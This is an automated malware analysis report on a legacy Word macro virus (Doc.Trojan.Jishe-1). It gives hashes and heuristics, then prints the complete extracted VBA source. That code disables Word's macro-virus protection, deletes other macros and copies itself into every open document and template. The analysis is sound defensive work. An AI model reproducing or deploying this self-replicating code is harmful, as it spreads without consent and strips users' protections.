Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 808a7177b8b60436…

MALICIOUS

Office (OLE)

Size: 54.5 KB
Created: 2001-06-19 02:17:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: a4fc5e9932c77d5deb502fb63a94ae37
SHA-1: a819aae31bd1800f4c1eb8e73fbe89ec67d47022
SHA-256: 808a7177b8b60436cbabe4b1f1616906a3cb481352a4511bd2da8a23f38c6a43
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically AutoOpen and Document_Open, which are commonly used to execute malicious code upon document opening. The presence of these macros and the ClamAV detection as 'Doc.Trojan.Jishe-1' strongly indicate a malicious intent to infect the user's system. No specific IOCs like URLs or file paths were extracted from the provided evidence.

Heuristics 6

  • ClamAV: Doc.Trojan.Jishe-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Jishe-1
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                If LinesofCode > 0 Then xItem.codemodule.DeleteLines 1, LinesofCode
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46588 bytes
SHA-256: ca2866c87e34d1f4a7611bf6a19c29c2b9713a39547eb6821f0db0c819c2a6d9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
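'This is a macro-virus protection program I made while learning; it can prevent infection by some WORD macro viruses
'It relies on a large number of macro-virus signatures; if you find a macro virus that this vaccine cannot handle,
'please contact me promptly; you may also modify this program yourself to strengthen the vaccine
'Fighting viruses is like resisting crime in society; it needs everyone's joint effort
'You are welcome to join in and become a soldier; perhaps you are the hero everyone has long been waiting for
'Program design: Ji Shenhua (冀慎华)
'Office phone:
'E-mail address: club@263.net
Option Explicit 'Variables in the program must be declared before use
Const answer0 = "FreeWordMacroVirusKiller" 'Kept for compatibility with earlier versions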
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0"
Const answer3 = "MyMacroVirusKillerV2.2" 'Marker of this program
'Version 2.0
Private Sub Document_Open()
    CloseVirusProtection
    'Check whether the opened documents contain a virus
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub

Attribute VB_Name = "JiShenhua"
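'This is a macro-virus protection program I made while learning; it can prevent infection by some WORD macro viruses
'It relies on a large number of macro-virus signatures; if you find a macro virus that this vaccine cannot handle,
'please contact me promptly; you may also modify this program yourself to strengthen the vaccine
'Fighting viruses is like resisting crime in society; it needs everyone's joint effort
'You are welcome to join in and become a soldier; perhaps you are the hero everyone has long been waiting for
'Program design: Ji Shenhua (冀慎华)
'Office phone:
'E-mail address: club@263.net
Option Explicit 'Variables in the program must be declared before use
Public pVirusReport As String 'Virus description text
Private Const cMyID As String = "MyMacroVirusKiller" 'Code marker of this program
Private Const cMyVersion As String = "V2.2" 'Version marker of this program
Private Const cMyModule As String = "JiShenhua" 'Module name of this program
Private Const cMyUserForm As String = "VirusReport" 'User form name of this program
Private Const cLinesofThisDocument As Integer = 25 'Total number of code lines in the ThisDocument module
Private Const cOK As Integer = 0 'Everything is normal
Private Const cDocHasModuleElse As Integer = 1 'Other modules are present
Private Const cDocHasCodeElse As Integer = 2 'Other code is present in the ThisDocument module
Private Const cDocHasAllElse As Integer = 3 'Other code is present in the ThisDocument module, and other modules are present
Private Const cDocProtected As Integer = 4 'The document is protected
Public Const cDocHasOldVersion As Integer = 8  'The document contains an old version of this antivirus module
'Runs automatically when a document is opened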
Sub AutoOpen()
    CloseVirusProtection
    'Check whether the opened documents contain a virus; if so, report to the user
    If ScanVirus Then
        Load VirusReport
        VirusReport.Show
    Else
        InfectAll
    End If
End Sub
'Runs automatically when a new document is created
Sub AutoNew()
    CloseVirusProtection
    Infect Word.ActiveDocument
End Sub
'Clean up the virus in the autoexec.dot file before WORD closes
Sub AutoExit()
    Const AutoDotFile = "C:\AUTOEXEC.DOT"
    If Dir(AutoDotFile) <> "" Then
        Kill AutoDotFile
    End If
End Sub
'Copy this program's code and modules from the specified file into all open documents and templates
Public Function InfectAll() As Boolean
    Dim myDoc As Document, myTemp As Template
    'Write this code into the open documents
    For Each myDoc In Documents
        Infect myDoc
    Next myDoc
    'Write this code into the WORD templates
    For Each myTemp In Templates
        Infect myTemp
    Next myTemp
    InfectAll = True
End Function
'Remove virus modules and code from all open documents and templates
Public Function ClearVirus() As Boolean
    Dim i As Integer
    Dim myDoc As Document, myTemp As Template
    Dim Cleared As Boolean
    
    ClearVirus = True
    'Check all documents and clean them
    For Each myDoc In Documents
        Cleared = ClearDocument(myDoc)
        If Not Cleared Then
            MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myDoc.Name
            ClearVirus = False
        End If
    Next myDoc
    'Check all templates and clean them
    For Each myTemp In Templates
        Cleared = ClearDocument(myTemp)
        If Not Cleared Then
            MsgBox "病毒清除工作不成功,请检查原因。", vbOKOnly, myTemp.Name
            ClearVirus = False
        End If
    Next myTemp
End Function
'Check whether a virus exists in any open document or template; if so, return the virus description string
Public Function ScanVirus() As Boolean
    Dim DocsCount As Integer, i As Integer, ret As Integer
    Dim myStr As String
    Dim myDoc As Document, myTemp As Template
    
    ScanVirus = 0
    pVirusReport = ""
    'Check whether the open documents contain a virus
    For Each myDoc In Documents
        ret = ScanDocument(myDoc)
        Select Case ret
            Case cOK, cDocProtected, cDocHasOldVersion
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
                ScanVirus = True
            Case Else
                MsgBox "函数ScanDocument返回错误代码,系统无法识别。", vbOKOnly, "系统出错"
        End Select
    Next myDoc
    'Check all templates
    For Each myTemp In Templates
        ret = ScanDocument(myTemp)
        Select Case ret
            Case cOK, cDocProtected, cDocHasOldVersion
            Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
                ScanVirus = True
            Case Else
                MsgBox "函数ScanDocument返回错误代码,系统无法识别。", vbOKOnly, "系统出错"
        End Select
    Next myTemp
End Function
'Copy this program's code from one file to another
Private Function Infect(TargetFile) As Boolean
    Dim xItem, CommandStr As String, file As String
    Dim myDoc As Document, myTemp As Template
    Dim LinesofCode As Long, myStr As String
    
    'Check that the argument type is correct
    myStr = TypeName(TargetFile)
    If myStr <> "Document" And myStr <> "Template" Then
        MsgBox "使用数据类型" + myStr + "调用函数Infect,系统只允许使用Document及Template类型。", vbOKOnly, "系统错误"
        Infect = False
        Exit Function
    End If
    Infect = True
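    If TargetFile.Name = ThisDocument.Name Then Exit Function 'Do not write when the target file is the same as the source file
    If Infected(TargetFile) Then Exit Function 'The target file already contains this program's code
    If TargetFile.VBProject.Protection Then Exit Function 'The target file is protected; writing is not possible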
    Infect = False
    
    'Remove other modules and code already present in the target document
    For Each xItem In TargetFile.VBProject.VBComponents
        If xItem.Name = "ThisDocument" Then
            LinesofCode = xItem.codemodule.CountOfLines
            If LinesofCode > 0 Then xItem.codemodule.DeleteLines 1, LinesofCode
        Else
            TargetFile.VBProject.VBComponents.Remove xItem
        End If
    Next xItem
    
    'Write this program's code and modules into the document
    WordBasic.macrocopy ThisDocument.FullName + ":" + cMyModule, TargetFile.FullName + ":" + cMyModule
    WordBasic.macrocopy ThisDocument.FullName + ":" + cMyUserForm, TargetFile.FullName + ":" + cMyUserForm

    ' ^o^ ^o^  ^o^ ^o^  ^o^ ^o^  ^o^ ^o^  ^o^ ^o^  ^o^ ^o^  ^o^ ^o^  ^o^ ^o^
    
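    'If this section is placed before the previous two statements, it causes a fatal error in VBA32.DLL and a crash;
    'with all my lifetime of programming experience I do not know why. Heavens! Where is the justice?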
    
    LinesofCode = ThisDocument.VBProject.VBComponents(1).codemodule.CountOfLines
    myStr = ThisDocument.VBProject.VBComponents(1).codemodule.lines(1, LinesofCode)
    TargetFile.VBProject.VBComponents(1).codemodule.InsertLines 1, myStr
    
    Infect = True
End Function
'Check whether the specified document already contains this program's code
Private Function Infected(TargetFile)
    Dim xItem, LinesofCode As Integer
    Dim BeInfected As Integer
    Dim myType As String, NewVersion As String
    
    myType = TypeName(TargetFile)
    If myType <> "Document" And myType <> "Template" Then
        MsgBox "使用数据类型" + myType + "调用函数Infected,系统只允许使用Document及Template类型。", vbOKOnly, "系统错误"
        Infected = True
        Exit Function
    End If
    
    'Check whether the target document is protected
    If TargetFile.VBProject.Protection Then
        Infected = True
        Exit Function
    End If
    
    'When ThisDocument, myModule and myUserForm are all present, the file has already been infected
    BeInfected = 0
    NewVersion = cMyID & cMyVersion
    For Each xItem In TargetFile.VBProject.VBComponents
        If xItem.Name = "ThisDocument" Then
            LinesofCode = xItem.codemodule.CountOfLines
            If (LinesofCode > 0) And (xItem.codemodule.Find(NewVersion, 1, 1, 1 + LinesofCode, 1)) Then
                BeInfected = BeInfected Or 1
            End If
        ElseIf xItem.Name = cMyModule Then
            BeInfected = BeInfected Or 2
        ElseIf xItem.Name = cMyUserForm Then
            BeInfected = BeInfected Or 4
        End If
    Next xItem
    If BeInfected = 7 Then
        Infected = True
    Else
        Infected = False
    End If
End Function
'Check whether a virus exists in the specified open document or template
Private Function ScanDocument(myDocOrTemp) As Integer
    Dim xItem, i As Integer, myStr As String
    Dim LinesofCode As Integer, NewVersion As String
    
    ScanDocument = cOK
    NewVersion = cMyID & cMyVersion
    'Check that the argument type is correct
    If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
        MsgBox "调用函数ScanDocument只能使用Document及Template数据类型。", vbOKOnly, "系统错误"
        Exit Function
    End If
    myStr = myDocOrTemp.Name + "检查结果:" + vbCrLf
    'Check whether the program modules are protected
    If myDocOrTemp.VBProject.Protection Then
        ScanDocument = cDocProtected
        myStr = myStr + "  文件中的程序代码被保护,系统无法自动查杀,但也可能存在病毒,请小心!" + vbCrLf
        Exit Function
    End If
    For Each xItem In myDocOrTemp.VBProject.VBComponents
        If (xItem.Name = "ThisDocument") Then
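            'If this part has code, treat it as a virus when the total line count exceeds the defined number of lines or this module's marker cannot be found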
            LinesofCode = xItem.codemodule.CountOfLines
            If LinesofCode > 0 Then
                If (LinesofCode > cLinesofThisDocument) Then
                    ScanDocument = ScanDocument Or cDocHasCodeElse
                    myStr = myStr + "  <" + xItem.Name + ">对象中有其他程序存在,大概是病毒。" + vbCrLf
                ElseIf Not xItem.codemodule.Find(NewVersion, 1, 1, 1 + LinesofCode, 1) Then 'Look for the new version
                    If xItem.codemodule.Find(cMyID, 1, 1, 1 + LinesofCode, 1) Then 'Look for an old version
                        ScanDocument = cDocHasOldVersion
                    Else
                        ScanDocument = ScanDocument Or cDocHasCodeElse
                        myStr = myStr + "  <" + xItem.Name + ">对象中有其他程序存在,大概是病毒。" + vbCrLf
                    End If
                End If
            End If
        ElseIf (xItem.Name <> cMyModule) And (xItem.Name <> cMyUserForm) Then
            'If the document contains any code other than this module's code, treat it as a virus
            ScanDocument = ScanDocument Or cDocHasModuleElse
            myStr = myStr + "  有其他模块<" + xItem.Name + ">存在,极有可能是病毒。" + vbCrLf
        End If
    Next
    If ScanDocument = cOK Then myStr = myStr + "没有病毒,请放心使用。" + vbCrLf
    pVirusReport = pVirusReport + myStr
End Function
'Remove virus modules and code from the specified open document or template
Private Function ClearDocument(myDocOrTemp) As Boolean
    Dim xItem, LinesofCode As Integer
    Dim NewVersion As String
    
    ClearDocument = False
    'Check that the argument type is correct
    If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
        MsgBox "调用函数ClearDocument只能使用Document及Template数据类型。", vbOKOnly, "系统错误"
        Exit Function
    End If
    If myDocOrTemp.VBProject.Protection Then
        ClearDocument = True
        Exit Function
    End If
    'Check whether the document has a virus
    NewVersion = cMyID & cDocHasOldVersion
    If ScanDocument(myDocOrTemp) Then
        For Each xItem In myDocOrTemp.VBProject.VBComponents
            If xItem.Name = "ThisDocument" Then
                LinesofCode = xItem.codemodule.CountOfLines
                If (LinesofCode > 0) And (Not xItem.codemodule.Find(NewVersion, 1, 1, 1 + LinesofCode, 1)) Then
                    xItem.codemodule.DeleteLines 1, LinesofCode
                End If
            ElseIf xItem.Name <> cMyModule And xItem.Name <> cMyUserForm Then
                myDocOrTemp.VBProject.VBComponents.Remove xItem
            End If
        Next
    End If
    ClearDocument = True
End Function
'Turn off Word's macro-virus protection
Public Function CloseVirusProtection(Optional Protected As Boolean = False)
    Options.VirusProtection = Protected
End Function


Attribute VB_Name = "VirusReport"
Attribute VB_Base = "0{1DA31361-649C-11D5-9CE6-0060083AC635}{1DA3135B-649C-11D5-9CE6-0060083AC635}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

'Form code
Option Explicit 'Variables in the program must be declared before use
'Actions performed when the form opens
Private Sub UserForm_Initialize()
    CheckBox1.Value = True
    Information.Value = pVirusReport
    Beep
End Sub
'Close the form without taking any action
Private Sub CommandButtonNothing_Click()
    Dim ret As Integer
    ret = MsgBox("领导,虽然你可能会批评我,但还是要告诉你,这样做是很危险的。" & vbCrLf & "是否真的不做处理,请批示。", vbYesNo + vbDefaultButton2, "再次报告!")
    If ret = vbYes Then
        Unload Me
    End If
End Sub
'Open the Visual Basic editor
Private Sub CommandButtonOpenVisubasic_Click()
    ShowVisualBasicEditor = True
End Sub
'Kill the virus
Private Sub CommandButtonKill_Click()
    If ClearVirus Then
        ResetMenu
        InfectAll
        Unload Me
        MsgBox "按照您的指示,我已经把可能是病毒的东东全部清理完毕," & vbCrLf & "不过也可能好心办了坏事,那可不要怪我哟。", vbOKOnly, "报告!"
    Else
        MsgBox "不知什么原因,清除病毒工作不成功,请您手工检查或与我联系。", vbOKOnly, "冀慎华向您报告:"
        Unload Me
    End If
End Sub
'Restore menu items changed by the virus
Private Function ResetMenu()
    Dim mItem, cItem, myKey As KeyBinding
    
    CustomizationContext = NormalTemplate
    'Alt+F8: open the Macros dialog
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
    'Alt+F11: open the Visual Basic editor
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyH)).Clear
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyK)).Clear

    'Restore the original settings of the Tools menu
    For Each mItem In CommandBars("Tools").Controls
        mItem.Reset
    Next mItem
    For Each cItem In CommandBars("Visual Basic").Controls
        cItem.Reset
    Next cItem
    For Each cItem In CommandBars
        If cItem.Visible = True Then
            cItem.Protection = msoBarNoProtection
        End If
    Next cItem
End Function

…